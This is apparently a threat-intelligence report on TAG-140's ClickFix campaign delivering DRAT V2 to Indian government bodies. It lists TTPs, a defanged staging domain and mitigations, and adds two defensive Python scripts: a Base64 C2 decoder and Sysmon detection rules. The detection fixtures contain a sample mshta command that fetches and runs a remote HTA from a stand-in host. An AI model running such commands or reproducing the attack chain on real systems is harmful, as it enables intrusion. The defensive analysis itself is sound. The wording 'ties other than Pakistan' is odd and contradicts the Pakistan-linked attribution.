Full Report
A hacking group with ties other than Pakistan has been found targeting Indian government organizations with a modified variant of a remote access trojan (RAT) called DRAT. The activity has been attributed by Recorded Future's Insikt Group to a threat actor tracked as TAG-140, which it said overlaps with SideCopy, an adversarial collective assessed to be an operational sub-cluster within
Analysis Summary
# Threat Actor: TAG-140 (Overlaps with SideCopy/Transparent Tribe)
## Attribution & Identity
Activity attributed by Recorded Future's Insikt Group to a threat actor tracked as **TAG-140**.
TAG-140 is assessed to overlap with **SideCopy**, which is considered an operational sub-cluster within **Transparent Tribe** (also known as APT-C-56, APT36, Datebug, Earth Karkaddan, Mythic Leopard, Operation C-Major, and ProjectM).
The group has been known to be active since at least 2019.
The article suggests TAG-140/SideCopy is linked to actors with ties other than Pakistan, though their associated cluster (Transparent Tribe) is often associated with Pakistan.
## Activity Summary
TAG-140 has been consistently advancing its malware arsenal and delivery techniques. The latest campaign involved spoofing the Indian Ministry of Defence via a cloned press release portal using a "ClickFix"-style approach to deliver a Delphi-compiled version of **DRAT V2**. This refined activity marks a shift in malware architecture and C2 functionality. The group is known to diversify its malware catalogue to complicate attribution. They were also active during the May 2025 India-Pakistan conflict, deploying **Ares RAT** against various sectors.
## Tactics, Techniques & Procedures
- **Initial Access/Delivery:** Used a forged website (cloned Indian Ministry of Defence press release portal) to drop malware.
- **Execution:** Employed a specific sequence where clicking a link copies a malicious command to the clipboard, urging the victim to paste and execute it via a command shell.
- **Execution/Staging:** Used `mshta.exe` to execute an HTML Application (HTA) file retrieved from `trade4wealth[.]in`.
- **Payload Loading:** Utilized a loader named **BroaderAspect** to download a decoy PDF, establish persistence, and download DRAT V2.
- **Persistence:** Established persistence via **Windows Registry** changes.
- **Post-Exploitation:** DRAT V2 supports arbitrary shell command execution, reconnaissance, uploading additional payloads, and data exfiltration.
- **Obfuscation/C2:** DRAT V2 obfuscates C2 IP addresses using **Base64-encoding** and uses a custom server-initiated TCP protocol that supports both ASCII and Unicode input (though the server responds only in ASCII). DRAT V2 is noted to keep most command headers in plaintext, prioritizing parsing reliability.
- **Malware Rotation:** The actor maintains an "interchangeable suite" of RATs to obscure signatures.
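The Base64-obfuscated C2 addresses noted above can be surfaced during static triage by decoding every Base64-looking token in a sample's strings and keeping only those that yield a valid IPv4 endpoint. The Python helper below is an added example, not code from the report or from Insikt Group; the strings it scans are constructed, and the 203.0.113.0/24 address is a documentation range, not an indicator from the campaign.

```python
import base64
import binascii
import ipaddress
import re

# Candidate tokens: at least 8 Base64-alphabet characters plus optional '=' padding.
_B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")
# Decoded form we are looking for: dotted quad, optionally followed by :port.
_ENDPOINT = re.compile(rb"^(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?$")


def decode_if_endpoint(token: bytes):
    """Return (ip, port) if the token Base64-decodes to a valid IPv4 endpoint, else None.

    Padding is re-added so tokens whose trailing '=' were stripped still decode;
    anything that is not valid Base64 is simply skipped.
    """
    padded = token + b"=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    m = _ENDPOINT.match(raw.strip())
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group(1).decode())
    except ipaddress.AddressValueError:
        return None  # e.g. an octet above 255
    port = int(m.group(2)) if m.group(2) else None
    if port is not None and not 0 < port < 65536:
        return None
    return str(ip), port


def find_encoded_endpoints(blob: bytes):
    """Scan a blob (such as the output of `strings` on a sample) for Base64 tokens
    that decode to IPv4 endpoints. Returns a list of (token, ip, port) tuples."""
    hits = []
    for m in _B64_TOKEN.finditer(blob):
        token = m.group(0)
        decoded = decode_if_endpoint(token)
        if decoded:
            hits.append((token.decode(), decoded[0], decoded[1]))
    return hits


# Constructed sample resembling a strings dump. The endpoint uses the
# documentation range 203.0.113.0/24, not a real C2 address.
SAMPLE_STRINGS = b"\n".join([
    b"kernel32.dll",
    b"SGVsbG8sIFdvcmxkIQ==",                  # "Hello, World!" - decodes, but is not an IP
    base64.b64encode(b"203.0.113.10:4444"),   # the kind of token we want to surface
    base64.b64encode(b"999.1.1.1:80"),        # decodes, but the address is invalid
    b"GetProcAddress",
])

if __name__ == "__main__":
    for token, ip, port in find_encoded_endpoints(SAMPLE_STRINGS):
        print(f"{token} -> {ip}:{port}")
```

Run against `strings -a sample.bin` output this yields a short candidate list to pivot on; because DRAT V2 is described as keeping its command headers in plaintext, the same dump is also worth reading for those headers directly.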
## Targeting
- **Sectors:** Indian government organizations across the defence, maritime, academic, railway, oil and gas, and external affairs sectors. (Transparent Tribe/APT36 activity has also targeted the IT, healthcare, and telecom sectors.)
- **Geography:** India (Primary focus mentioned for the DRAT V2 campaign).
- **Victims:** Organizations affiliated with Indian government ministries.
## Tools & Infrastructure
- **Malware families used (RAT Arsenal):** **DRAT V2** (latest variant), Action RAT, AllaKore RAT, Ares RAT, CurlBack RAT, ReverseRAT, Spark RAT, and Xeno RAT.
- **Loaders/Backdoors:** BroaderAspect.
- **Infrastructure:** External server at `trade4wealth[.]in` used to serve the HTA, the persistence loader, and DRAT V2. (DRAT V2's C2 addresses are Base64-obfuscated within the sample, and its traffic uses a custom TCP protocol.) *(Note: The input text mentions other unrelated actors using Google Cloud and Discord for C2, but these are not specifically linked to the TAG-140 DRAT V2 campaign.)*
## Implications
TAG-140/SideCopy represents a persistent, evolving threat actor focused on espionage against Indian government and critical infrastructure entities. Their strategy of deploying a rotating "interchangeable suite" of RATs (like DRAT V2 replacing earlier variants) is designed to significantly complicate signature-based detection and attribution efforts. The refinement in C2 protocol (handling ASCII/Unicode) shows continuous adaptation.
## Mitigations
- Implement rigorous filtering and behavioral monitoring for suspicious execution chains involving `mshta.exe` launched after questionable external actions (like clipboard manipulation).
- Monitor for suspicious file creation and persistence mechanisms established via Windows Registry modifications.
- Harden systems against spear-phishing that spoofs official government portals.
- Hunt for the Remote Access Trojan (RAT) families listed in the group's arsenal, since the actor rotates between them rather than relying on a single family.
- Static and behavioral analysis tools should be employed, as DRAT V2 lacks advanced anti-analysis techniques, making it detectable through these means.
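The first two mitigations describe two concrete detection opportunities: `mshta.exe` launched from a shell with a remote HTA, and Run-key persistence pointing at a user-writable path. The Python below is an added example, not a rule shipped with the report, and runs those checks over a handful of constructed Sysmon-style events (field names follow Sysmon event 1 and event 13); the domain, SID and paths in the sample are made up.

```python
import re

# Parents a pasted "ClickFix" command would run under: a console shell, or
# explorer.exe when the Win+R Run dialog is used.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Public|ProgramData|Downloads)\\", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev: dict):
    """Sysmon event 1: flag mshta.exe launched from a shell and/or given a remote URL."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) != "mshta.exe":
        return None
    parent = _basename(ev.get("ParentImage", ""))
    remote = URL_RE.search(ev.get("CommandLine", ""))
    if parent in SHELL_PARENTS and remote:
        return {"rule": "mshta_remote_hta_from_shell",
                "detail": f"{parent} -> mshta.exe {remote.group(0)}"}
    if remote:
        return {"rule": "mshta_remote_hta", "detail": remote.group(0)}
    return None  # local HTA from a non-shell parent: no finding


def check_registry_set(ev: dict):
    """Sysmon event 13: flag Run/RunOnce values whose data points into user-writable dirs."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    details = ev.get("Details", "")
    if RUN_KEY_RE.search(target) and USER_WRITABLE_RE.search(details):
        return {"rule": "run_key_user_writable_path", "detail": f"{target} = {details}"}
    return None


def scan(events):
    """Apply every check to every event; return the list of findings in event order."""
    alerts = []
    for ev in events:
        for check in (check_process_create, check_registry_set):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed events (hostnames, SID and paths are invented for the sample).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta.exe https://stage.example.invalid/press.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},   # benign local HTA
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Roaming\svc\updater.exe"},
    {"EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},                 # installed software
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["rule"], "|", alert["detail"])
```

The two rules are deliberately narrow: an installer running a local HTA and a Run value pointing under Program Files both pass, while the shell-to-mshta-to-URL chain and the AppData Run value both surface. In production the same logic maps onto a SIEM query over the corresponding Sysmon fields.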